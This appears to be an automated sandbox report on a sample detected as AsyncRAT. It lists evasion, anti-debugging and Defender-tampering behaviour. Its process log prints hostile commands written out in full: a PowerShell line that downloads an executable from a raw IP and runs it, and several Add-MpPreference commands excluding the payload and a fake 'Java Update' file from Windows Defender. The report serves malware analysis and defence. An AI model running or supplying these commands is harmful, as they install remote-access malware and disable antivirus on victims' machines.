                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              barindex
                              Yara detected AsyncRAT
                              Source: Yara matchFile source: 5.0.x.exe.30000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000005.00000000.2053544136.0000000000032000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: x.exe PID: 616, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Java Update (32bit).exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\x.exe, type: DROPPED
                              Check if machine is in data center or colocation facility
                              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                              Source: C:\Users\user\AppData\Local\Temp\x.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                              Source: x.exe, 00000005.00000002.3264722419.0000000002301000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                              Source: x.exe, 00000005.00000000.2053544136.0000000000032000.00000002.00000001.01000000.00000004.sdmp, Java Update (32bit).exe.5.dr, x.exe.3.drBinary or memory string: SBIEDLL.DLLINFO
                              Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 560000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 1A300000 memory reserve | memory write watchJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeWindow / User API: threadDelayed 406Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3702Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6145Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeWindow / User API: threadDelayed 6334Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeWindow / User API: threadDelayed 3501Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5657Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3975Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7582Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2080Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7304
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2308
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6735
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2784
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3556Thread sleep count: 3702 > 30Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1984Thread sleep count: 6145 > 30Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6008Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6556Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6768Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4164Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1276Thread sleep count: 7582 > 30Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6204Thread sleep count: 2080 > 30Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1352Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6628Thread sleep time: -2767011611056431s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5568Thread sleep count: 6735 > 30
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2020Thread sleep time: -3689348814741908s >= -30000s
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6716Thread sleep count: 2784 > 30
                              Source: C:\Users\user\AppData\Local\Temp\x.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                              Source: C:\Users\user\AppData\Local\Temp\x.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeFile opened: C:\Users\user\AppData\Jump to behavior
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeFile opened: C:\Users\user\Jump to behavior
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeFile opened: C:\Users\user\AppData\Local\Temp\D64C.tmp\D64D.tmpJump to behavior
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeFile opened: C:\Users\user\AppData\Local\Temp\D64C.tmpJump to behavior
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeFile opened: C:\Users\user\AppData\Local\Temp\D64C.tmp\D64D.tmp\D64E.tmpJump to behavior
                              Source: x.exe.3.drBinary or memory string: vmware
                              Source: x.exe, 00000005.00000002.3281056817.000000001B1C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJJ
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                              Anti Debugging

                              barindex
                              Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00007FF848E66E61 CheckRemoteDebuggerPresent,5_2_00007FF848E66E61
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeCode function: 0_2_0040ADD6 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,0_2_0040ADD6
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeCode function: 0_2_00409FD0 SetUnhandledExceptionFilter,0_2_00409FD0
                              Source: C:\Users\user\Desktop\da6ke5KbfB.exeCode function: 0_2_00409FB0 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,0_2_00409FB0
                              Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: page read and write | page guardJump to behavior

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Adds a directory exclusion to Windows Defender
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\x.exe'
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update (32bit).exe'
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\x.exe'Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update (32bit).exe'Jump to behavior
                              Bypasses PowerShell execution policy
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\x.exe'
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri http://45.141.26.234/x.exe -OutFile C:\Users\user\AppData\Local\Temp\x.exe"Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe C:\Users\user\AppData\Local\Temp\x.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\x.exe'Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe'Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update (32bit).exe'Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update (32bit).exe'Jump to behavior
                              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
